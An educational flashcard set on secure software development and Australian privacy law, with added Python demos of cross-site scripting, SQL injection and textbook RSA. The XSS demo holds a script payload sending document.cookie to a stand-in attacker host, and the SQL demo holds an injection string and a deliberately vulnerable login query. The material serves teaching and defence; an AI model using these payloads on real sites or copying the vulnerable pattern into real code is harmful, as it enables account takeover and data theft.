Verifying a user's identity, e.g. with a username and password, before allowing authorised access to a system
What is user authentication?
To review the software for compliance with specific standards.
What is software auditing?
When personal information is accessed or disclosed without authorisation, or is lost.
What are data breaches?
An attacker injects malicious JavaScript into an unsecured web page, web application or web server so that it runs in other users' browsers.
What is cross-site scripting?
Federal:
- Copyright Act 1968
- Privacy Act 1988
State:
- Privacy & Data Protection Act 2014
- Health Records Act 2001
What legislation applies at Federal and State (Victorian) level?
A category of software tools that help a software team manage changes to source code over time.
Developers commit the updates and changes they make to an application's source code, so every change is recorded and can be reviewed or reverted.
What are version control systems?
A simulated cyber attack against your computer system to check for exploitable vulnerabilities.
What is penetration testing?
Leaked email addresses used for phishing scams
Breaches of Privacy Law (fines)
Unauthorized access to customer accounts
Loss of reputation with customers
Company collapse
What are the consequences for data breaches?
Allows dynamic and interactive content on HTML/CSS webpages
What is Javascript?
Recognizes that any original work is the property of the person who created it
What is the Copyright Act 1968?
Vulnerabilities in existing systems are constantly identified, and fixes for them are released by the distributors of the software.
What are software updates?
Data loss (crashing bugs)
Unauthorised access (lack of security)
Third party service goes offline
Compliance with tech standards
Privacy issues (is data protected?)
Legal issues (Copyright, Privacy)
Licensing (all parts licensed appropriately)
What risks could poor or malicious code bring?
An attacker positions themselves between a client and the service it is talking to, e.g. by 'spoofing' an unsecured Wi-Fi network that the client connects to.
All traffic can then be read or modified by the attacker.
What is a man-in-the-middle attack?
Validate input and HTML-encode (escape) user-supplied data before inserting it into a page, so characters such as <, >, " and & are shown as text rather than interpreted as HTML or JavaScript
How do you prevent cross-site scripting?
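As an added example (not part of the original study set), the card above in working Python: a constructed user comment containing a script tag is rendered once by string insertion and once after HTML-encoding with the standard library's html.escape. Only the first version would execute in a visitor's browser. The page template and comment text are assumptions made for the demo.

```python
import html

# Constructed sample input: a "comment" submitted by a malicious user.
USER_COMMENT = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_vulnerable(comment: str) -> str:
    """Insert the raw comment into the page.

    The <script> tag survives intact, so every visitor's browser would
    run it (stored cross-site scripting).
    """
    return f"<p class='comment'>{comment}</p>"


def render_safe(comment: str) -> str:
    """HTML-encode the comment before inserting it.

    < > & " and ' become entities (&lt; &gt; &amp; &quot; &#x27;), so the
    browser displays the comment literally instead of executing it.
    """
    return f"<p class='comment'>{html.escape(comment, quote=True)}</p>"


def contains_script_tag(page: str) -> bool:
    """Crude check used to show the difference: is a live <script tag present?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(USER_COMMENT))
    print(render_safe(USER_COMMENT))
```

Escaping is context dependent: html.escape is the right encoding for text and attribute values inside HTML, but data placed inside a <script> block or a URL needs the encoding for that context instead.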
Rules for the collection, storage & communication of personal information
What is the Privacy Act 1988?
Encoding information so that it is unreadable without the encryption key.
What is encryption?
- uncover any issues or problems early; it is simpler and costs less to fix an issue earlier in the project
- improve performance, scalability and reliability
- review any necessary or unnecessary testing
- ensure the application can be maintained and extended in the future
- make sure you use the appropriate technology for the job
- satisfy legal and licensing requirements
What is the purpose of software auditing?
Manipulating people rather than technology, e.g. tricking the victim into clicking 'accept' on a prompt that grants admin permissions, or into giving the attacker physical access to a device.
What is social engineering?
Running malicious SQL commands via unsanitised user input that is concatenated into a query
Allows unauthorised users to read, add, modify or delete the contents of the SQL database
What is an SQL injection?
Collection and handling of health information in public and private sector
What is the Health Records Act 2001?
The receiver (Bob) generates a Public-Private key pair.
Bob gives the sender (Alice) his public key. Bob keeps his private key.
Alice encrypts her data with Bob’s public key, and sends the encrypted data to Bob.
Bob uses his private key to decrypt the data.
What is Asymmetric Encryption?
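As an added example (not part of the original study set), the four steps above carried out with textbook RSA in pure Python. The primes 61 and 53 and the message 65 are constructed demo values: a modulus this small is trivially factored, and real systems use 2048-bit or larger keys with padding, so this shows the flow, not a usable cipher.

```python
from math import gcd


def keygen(p: int, q: int, e: int = 17):
    """Step 1: Bob generates a key pair from two primes (textbook RSA).

    Returns (public_key, private_key) as ((n, e), (n, d)).
    """
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse of e, so (m^e)^d == m mod n
    return (n, e), (n, d)


def encrypt(public_key, m: int) -> int:
    """Step 3: Alice encrypts with Bob's public key; anyone may do this."""
    n, e = public_key
    if not 0 <= m < n:
        raise ValueError("message must be smaller than the modulus")
    return pow(m, e, n)


def decrypt(private_key, c: int) -> int:
    """Step 4: only the holder of d (Bob) can reverse the encryption."""
    n, d = private_key
    return pow(c, d, n)


if __name__ == "__main__":
    # Constructed demo primes; far too small for real use.
    bob_public, bob_private = keygen(61, 53)
    # Step 2: Bob publishes bob_public; bob_private never leaves Bob.
    ciphertext = encrypt(bob_public, 65)
    print("ciphertext:", ciphertext)          # 2790
    print("Bob decrypts:", decrypt(bob_private, ciphertext))  # 65
    # An eavesdropper who only has the public key cannot recover the message.
    print("Eve with public key:", decrypt(bob_public, ciphertext))
```

The last line applies the public exponent to the ciphertext, which is what an eavesdropper could do; it does not recover 65 because only d inverts e modulo phi(n).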
Usernames / passwords
Personal information
Bank details
Credit card numbers
Health information
What information can be lost in a data breach?
Use parameterised queries (prepared statements) so user input is passed as data, never as part of the SQL text; validate and sanitise/escape input as an extra layer
How do you prevent SQL injections?
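As an added example (not part of the original study set) covering both the SQL injection card and this prevention card: a login check written once with string concatenation and once with a parameterised query, run against a constructed in-memory SQLite table. The payload ' OR '1'='1 logs in without the password through the first version only. Table layout, user names and passwords are assumptions for the demo (passwords are stored in plain text here purely to keep it short; real systems store hashes).

```python
import sqlite3

# Constructed sample: the classic payload that turns the WHERE clause true.
PAYLOAD = "' OR '1'='1"


def build_db() -> sqlite3.Connection:
    """Create a throwaway in-memory users table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Build the query by concatenation: quotes in the input become SQL syntax.

    With password = "' OR '1'='1" the query becomes
      ... WHERE username = 'alice' AND password = '' OR '1'='1'
    which matches every row.
    """
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the driver binds the values separately from the
    SQL text, so a quote in the input is just a character in a string."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, correct password:", login_vulnerable(db, "alice", "s3cret"))
    print("vulnerable, injection payload:", login_vulnerable(db, "alice", PAYLOAD))
    print("safe, correct password:", login_safe(db, "alice", "s3cret"))
    print("safe, injection payload:", login_safe(db, "alice", PAYLOAD))
```

The safe version needs no character stripping at all: the "?" placeholders are the defence, and input validation on top of that only narrows what an attacker can send.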
Privacy Act equivalent for Victorian government agencies (VicRoads, WorkSafe)
What is the Privacy and Data Protection Act 2014?